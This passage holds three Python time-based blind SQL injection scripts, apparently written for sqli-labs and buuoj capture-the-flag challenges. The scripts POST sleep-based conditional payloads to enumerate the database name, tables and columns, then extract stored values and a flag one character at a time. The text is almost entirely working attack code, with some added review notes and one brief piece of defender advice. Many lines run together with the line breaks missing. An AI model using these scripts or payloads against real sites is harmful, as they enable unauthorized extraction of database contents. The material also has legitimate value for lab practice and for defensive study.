def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):payload = "admin' and if((select count(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"')="+str(DBColumnCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a+1))# 先获取字段的长度for columnLen in range(99):payload = "admin' and if((select length(column_name) from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1)="+str(columnLen)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen+1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):timeStart = time.time()payload = "' and if(ascii(substr((select column_name from information_schema.columns where table_schema='"+dbname+"' and table_name='"+dbtable+"' limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)#清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):payload = "admin' and if((select count("+dbcolumn+") from "+dbtable+")="+str(DBDataCount)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a+1))#先获取这个数据的长度dataLen = 0for dataLen in range(99):payload = "admin'and  if((select length("+dbcolumn+") from "+dbtable+" limit "+str(a)+",1)="+str(dataLen)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.post(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a+1, dataLen))break#临时存放数据内容变量data1 = ""#开始获取数据的具体内容#b表示当前数据内容猜解的位置for b in range(1, dataLen+1):for c in range(33, 128):payload = "admin' and  if(ascii(substr((select "+dbcolumn+" from "+dbtable+" limit "+str(a)+",1),"+str(b)+",1))="+str(c)+",sleep(5),0) #"data = {'uname':payload,'passwd':'admin','submit':'Submit',}timeStart = time.time()res = conn.get(url,data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:data1 += chr(c)print(data1)break#放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn,[]).append(data1)print(DBData)#把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):
    """Run the full sequence: database name, tables, columns, then values.

    After listing the tables the operator picks one by its 1-based number;
    the column menu then repeats until 0 is entered.

    NOTE(review): the menu input goes straight through int() and is used as a
    list index without a range check, so a non-numeric or out-of-range entry
    raises.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url,DBName)
    print("[+]数据库{0}的表如下:".format(DBName))
    for item in range(len(DBTables)):
        print("(" + str(item + 1) + ")" + DBTables[item])
    tableIndex = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url,DBName,DBTables[tableIndex])
    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[tableIndex]))
        for item in range(len(DBColumns)):
            print("(" + str(item + 1) + ")" + DBColumns[item])
        columnIndex = int(input("[*]请输入要查看字段的序号(输入0退出):"))-1
        # Entering 0 yields -1 here and leaves the menu.
        if(columnIndex == -1):
            break
        else:
            GetDBData(url, DBTables[tableIndex], DBColumns[columnIndex])


if __name__ == '__main__':
    # NOTE(review): the try block only covers option parsing and thread start;
    # the extraction itself runs in threadSQL, so a KeyboardInterrupt during
    # the run is not handled by this except clause.
    try:
        # NOTE(review): the usage text names BlindTime_get.py although this
        # listing is the POST variant.
        usage = "./BlindTime_get.py -u url"
        parser = OptionParser(usage)
        # -u / --url: target URL; the default is a local lab page.
        parser.add_option('-u', '--url', dest='url',default='http://localhost/Less-15/', type='string',help='target URL')
        options, args = parser.parse_args()
        url = options.url
        threadSQL = threading.Thread(target=StartSqli,args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")

整体改动过的脚本Time-POST

修改的地方:

payload
data
添加了time.sleep(0.05)
default
修改时要注意间隔

#!/usr/bin/python3
# -*- coding: utf-8 -*-import requests
from optparse import OptionParser
import time
import threading# 存放数据库名变量
DBName = ""
# 存放数据库表变量
DBTables = []
# 存放数据库字段变量
DBColumns = []
# 存放数据字典变量,键为字段名,值为字段数据列表
DBData = {}# 设置重连次数以及将连接改为短连接
# 防止因为HTTP连接数过多导致的 Max retries exceeded with url
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False# 获取数据库名函数
def GetDBName(url):
    """Recover the current database name through a timing oracle over POST.

    The conditional expression, which calls ``sleep(5)`` when the condition
    holds, is posted as the whole value of the ``id`` form field (no quote
    prefix and no trailing comment, unlike the login-form variant).  A request
    lasting at least 5 seconds counts as true.  Length is searched in 1..98,
    characters in ASCII 33..127; the result is accumulated in the global
    ``DBName``.  The character loop pauses 0.05 s before each request.

    Defender view: a field that should hold a numeric id but arrives as an
    ``if(...,sleep(5),0)`` expression is rejected outright by strict type
    validation, and by binding the id as a query parameter.
    """
    # Bind the module-level DBName so the += below updates it.
    global DBName
    print("[-]开始获取数据库名长度")
    # Holds the database-name length once found.
    DBNameLen = 0
    for DBNameLen in range(1, 99):
        # Start of the timed interval.
        timeStart = time.time()
        payload = "if(length(database())=" + str(DBNameLen) + ",sleep(5),0)"
        data = {'id': payload,}
        res = conn.post(url, data=data)
        # End of the timed interval.
        timeEnd = time.time()
        # A delay of 5 s or more is read as "condition true".
        if timeEnd - timeStart >= 5:
            print("[+]数据库名长度:" + str(DBNameLen))
            break
    print("[-]开始获取数据库名")
    # a is the 1-based substr() start position.
    for a in range(1, DBNameLen + 1):
        # b runs over ASCII codes 33..127.
        for b in range(33, 128):
            # Fixed pause between requests.
            time.sleep(0.05)
            timeStart = time.time()
            payload = "if(ascii(substr(database()," + str(a) + ",1))=" + str(b) + ",sleep(5),0)"
            data = {'id': payload,}
            res = conn.post(url, data=data)
            timeEnd = time.time()
            if timeEnd - timeStart >= 5:
                DBName += chr(b)
                print("[-]" + DBName)
                break
# Table-enumeration function.
def GetDBTables(url, dbname):global DBTables# 存放数据库表数量的变量DBTableCount = 0print("[-]开始获取{0}数据库表数量:".format(dbname))# 开始遍历获取数据库表的数量for DBTableCount in range(1, 99):time.sleep(0.05)timeStart = time.time()payload = "if((select count(table_name) from information_schema.tables where table_schema='" + dbname + "' )=" + str(DBTableCount) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[+]{0}数据库的表数量为:{1}".format(dbname, DBTableCount))breakprint("[-]开始获取{0}数据库的表".format(dbname))# 遍历表名时临时存放表名长度变量tableLen = 0# a表示当前正在获取表的索引for a in range(0, DBTableCount):print("[-]正在获取第{0}个表名".format(a + 1))# 先获取当前表名的长度for tableLen in range(1, 99):time.sleep(0.05)payload = "if((select length(table_name) from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)=" + str(tableLen) + ",sleep(5),0)"timeStart = time.time()data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# 开始获取表名# 临时存放当前表名的变量table = ""# b表示当前表名猜解的位置for b in range(1, tableLen + 1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):time.sleep(0.05)timeStart = time.time()payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='" + dbname + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:table += chr(c)print(table)break# 把获取到的名加入到DBTablesDBTables.append(table)# 清空table,用来继续获取下一个表名table = ""# 获取数据库表的字段函数
def GetDBColumns(url, dbname, dbtable):global DBColumns# 存放字段数量的变量DBColumnCount = 0print("[-]开始获取{0}数据表的字段数:".format(dbtable))for DBColumnCount in range(99):time.sleep(0.05)payload = "if((select count(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "')=" + str(DBColumnCount) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}数据表的字段数为:{1}".format(dbtable, DBColumnCount))break# 开始获取字段的名称# 保存字段名的临时变量column = ""# a表示当前获取字段的索引for a in range(0, DBColumnCount):print("[-]正在获取第{0}个字段名".format(a + 1))# 先获取字段的长度for columnLen in range(99):time.sleep(0.05)payload = "if((select length(column_name) from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)=" + str(columnLen) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:break# b表示当前字段名猜解的位置for b in range(1, columnLen + 1):# c表示33~127位ASCII中可显示字符for c in range(33, 128):time.sleep(0.05)timeStart = time.time()payload = "if(ascii(substr((select column_name from information_schema.columns where table_schema='" + dbname + "' and table_name='" + dbtable + "' limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:column += chr(c)print(column)break# 把获取到的名加入到DBColumnsDBColumns.append(column)# 清空column,用来继续获取下一个字段名column = ""# 获取表数据函数
def GetDBData(url, dbtable, dbcolumn):global DBData# 先获取字段数据数量DBDataCount = 0print("[-]开始获取{0}表{1}字段的数据数量".format(dbtable, dbcolumn))for DBDataCount in range(99):time.sleep(0.05)payload = "if((select count(" + dbcolumn + ") from " + dbtable + ")=" + str(DBDataCount) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]{0}表{1}字段的数据数量为:{2}".format(dbtable, dbcolumn, DBDataCount))breakfor a in range(0, DBDataCount):print("[-]正在获取{0}的第{1}个数据".format(dbcolumn, a + 1))# 先获取这个数据的长度dataLen = 0for dataLen in range(99):time.sleep(0.05)payload = "if((select length(" + dbcolumn + ") from " + dbtable + " limit " + str(a) + ",1)=" + str(dataLen) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.post(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:print("[-]第{0}个数据长度为:{1}".format(a + 1, dataLen))break# 临时存放数据内容变量data1 = ""# 开始获取数据的具体内容# b表示当前数据内容猜解的位置for b in range(1, dataLen + 1):for c in range(33, 128):time.sleep(0.05)payload = "if(ascii(substr((select " + dbcolumn + " from " + dbtable + " limit " + str(a) + ",1)," + str(b) + ",1))=" + str(c) + ",sleep(5),0)"data = {'id': payload,}timeStart = time.time()res = conn.get(url, data=data)timeEnd = time.time()if timeEnd - timeStart >= 5:data1 += chr(c)print(data1)break# 放到以字段名为键,值为列表的字典中存放DBData.setdefault(dbcolumn, []).append(data1)print(DBData)# 把data清空来,继续获取下一个数据data1 = ""# 盲注主函数
def StartSqli(url):
    """Drive the interactive session: database name, tables, columns, data.

    Calls ``GetDBName`` and ``GetDBTables``, lists the tables held in the
    module-level ``DBTables``, asks for a table number, calls
    ``GetDBColumns`` for it, then repeatedly lists ``DBColumns`` and calls
    ``GetDBData`` for the chosen column until 0 is entered.

    Menu numbers are 1-based and converted with ``- 1``. Entering 0 at the
    table prompt therefore gives index -1, which Python resolves to the
    last table. Non-numeric input makes ``int()`` raise ``ValueError``.
    """
    GetDBName(url)
    print("[+]当前数据库名:{0}".format(DBName))
    GetDBTables(url, DBName)

    print("[+]数据库{0}的表如下:".format(DBName))
    for number, table_name in enumerate(DBTables, start=1):
        print("(" + str(number) + ")" + table_name)
    table_idx = int(input("[*]请输入要查看表的序号:")) - 1
    GetDBColumns(url, DBName, DBTables[table_idx])

    while True:
        print("[+]数据表{0}的字段如下:".format(DBTables[table_idx]))
        for number, column_name in enumerate(DBColumns, start=1):
            time.sleep(0.05)
            print("(" + str(number) + ")" + column_name)
        column_idx = int(input("[*]请输入要查看字段的序号(输入0退出):")) - 1
        if column_idx == -1:
            break
        GetDBData(url, DBTables[table_idx], DBColumns[column_idx])


if __name__ == '__main__':
    # The try block covers only option parsing and starting the thread;
    # StartSqli itself runs in the worker thread.
    try:
        usage = "./BlindTime_get.py -u url"
        parser = OptionParser(usage)
        # -u / --url: endpoint to send the probes to. The default is a
        # buuoj.cn challenge-instance address hard-coded by the author.
        parser.add_option(
            '-u', '--url',
            dest='url',
            default='http://1e21f92c-e6dd-42ac-95f0-ed1281e49749.node4.buuoj.cn:81/',
            type='string',
            help='target URL',
        )
        options, args = parser.parse_args()
        url = options.url
        threadSQL = threading.Thread(target=StartSqli, args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")

时间盲注-POST-1

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import threading
import time
from optparse import OptionParser

import requests

# Database name.
DBName = ""
# Table names of the database.
DBTables = []
# Column names of the selected table.
DBColumns = []
# Recovered data: column name -> list of values read from that column.
DBData = {}

# Author's intent: raise the reconnect count and use short-lived connections,
# to avoid "Max retries exceeded with url" errors attributed to too many
# open HTTP connections.
requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False


def woqv(url):
    """Read the value of ``select(flag)from(flag)`` one character at a time.

    For positions 1..49 and ASCII codes 33..126, POSTs a form field ``id``
    holding ``if((ascii(substr(...,pos,1))=code),sleep(5),0)`` and treats a
    reply that takes five seconds or longer as a match. Matched characters
    are accumulated and printed; nothing is returned.

    The loop does not stop at the end of the value: a position with no
    matching code is skipped, so a full run sends up to 49 * 94 requests,
    each preceded by a 0.05 s pause. The progress message printed at the
    start still refers to the database-name length, which this function
    does not query.

    What the target sees: repeated POSTs whose ``id`` field contains the
    literal ``sleep(5)`` and a sub-select on ``flag``, with one request per
    recovered character held for at least five seconds.
    """
    recovered = ""
    print("[-]开始获取数据库名长度")
    for position in range(1, 50):
        for code in range(33, 127):
            time.sleep(0.05)
            payload = "if((ascii(substr((select(flag)from(flag)),{0},1))={1}),sleep(5),0)".format(position, code)
            # Example payload left in the original as a comment:
            # "admin' and if(length(database())=8,sleep(5),0) #"
            sent_at = time.time()
            conn.post(url, data={'id': payload,})
            # Elapsed wall-clock time is the only signal that is read.
            if time.time() - sent_at < 5:
                continue
            recovered += chr(code)
            print(recovered)
            break
# Main routine of the blind-injection script
def StartSqli(url):
    """Thread entry point: run ``woqv`` against *url*."""
    woqv(url)


if __name__ == '__main__':
    # The try block covers only option parsing and starting the thread;
    # the probing itself runs in the worker thread.
    try:
        usage = "./BlindTime_get.py -u url"
        parser = OptionParser(usage)
        # -u / --url: endpoint to send the probes to. The default is a
        # buuoj.cn challenge-instance address hard-coded by the author.
        parser.add_option(
            '-u', '--url',
            dest='url',
            default='http://4fbbc7a5-c5b9-4628-b997-a2c82c97252d.node4.buuoj.cn:81/',
            type='string',
            help='target URL',
        )
        options, args = parser.parse_args()
        url = options.url
        threadSQL = threading.Thread(target=StartSqli, args=(url,))
        threadSQL.start()
    except KeyboardInterrupt:
        print("Interrupted by keyboard inputting!!!")
